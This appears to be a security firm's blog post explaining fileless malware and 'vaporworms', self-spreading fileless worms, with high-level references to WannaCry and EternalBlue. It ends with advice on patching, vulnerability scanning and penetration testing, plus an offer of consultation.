Understanding the Vaporworm Threat


Malware is constantly evolving as attackers develop new and more sophisticated variants to bypass or defeat enterprise network security defenses. In recent years, fileless malware has made headlines due to its ability to circumvent many of the protections used by traditional antivirus solutions.

In 2019, the vaporworm threat has emerged as the next evolution of malware, combining the subtlety of fileless malware with the scalability of self-spreading worms.

What is Fileless Malware?

Traditional malware and antivirus systems are very file-focused. When your computer was infected with malware, it was because an executable file was downloaded and executed on it through any of a number of attack vectors (phishing, web application vulnerabilities, etc.).

This made traditional antivirus (AV) solutions simple but effective. These AVs scanned every file on the system and compared them to known “signatures” of malicious files. If a file matched the signature, it would be quarantined and deleted (if it managed to install itself at all).

Fileless malware was developed to defeat this file-focused technique by creating malware that operated solely in the computer’s memory. By never writing itself to disk, this type of malware evaded traditional antivirus softwares that focus on disk-saved files.

Fileless malware accomplishes its goals by “living off the land”. Built into every computer are multiple powerful programs that allow attackers to achieve their goals (PowerShell, etc.). By using these built-in programs (which are also used by legitimate system administrators) and operating from memory instead of a file written to disk, fileless malware becomes stealthier and more difficult to detect than traditional variants.

Vaporworms and How They’re Different?

Fileless malware is bad enough, but vaporworms advance the threat to the next level. A vaporworm is a fileless malware variant that also has the ability to spread itself without human interaction.

If you’re familiar with the WannaCry and NotPetya epidemics, then you’re familiar with worms. These malware variants don’t use phishing or other human-aided mechanisms to spread themselves. Instead, they take advantage of vulnerabilities in systems to infect them.

For example, WannaCry used the EternalBlue exploit developed by the National Security Agency. This exploit took advantages of vulnerabilities in the Server Message Block (SMB) protocol, which is used for file sharing on Windows devices.

Instead of generating phishing emails and trying to collect clicks, worm authors develop and launch their malware. The malware takes care of spreading on its own by scanning for vulnerable devices and sending a copy of itself to exploit and execute there.

WatchGuard Technologies’ information security predictions for 2019 highlight the severity of this threat.

“Cyber criminals are continuing to reshape the threat landscape as they update their tactics and escalate their attacks against businesses, governments and even the infrastructure of the internet itself,” said WatchGuard Technologies CTO Corey Nachreiner.

Protecting Against Vaporworms

When dealing with any worm variant, a proactive approach is essential. This type of malware spreads by identifying and exploiting vulnerabilities in your systems. Failing to identify and patch any of the vulnerabilities currently being used by worms could result in your system being infected with malware.

With vaporworms, the need to perform vulnerability scanning and patching on a regular basis is even more important. Since vaporworms are fileless malware, your traditional antivirus defenses may not be capable of detecting and removing them. If a vaporworm gets onto your computer, there’s a good chance it’s here to stay unless removed by an expert.

Penetration testing is another good way to test your systems. A pen test is a simulated cyber attack against your systems to check for vulnerabilities before bad actors find them. Also known as ethical hacking, pen tests that include manual analysis identify flawed logic, misconfigurations, vulnerability chaining, and more to show the security impact to your business.

If you want more information about how to set up a vulnerability scanning program or penetration testing to stop vaporworms, reach out for a consultation.

Comments are closed.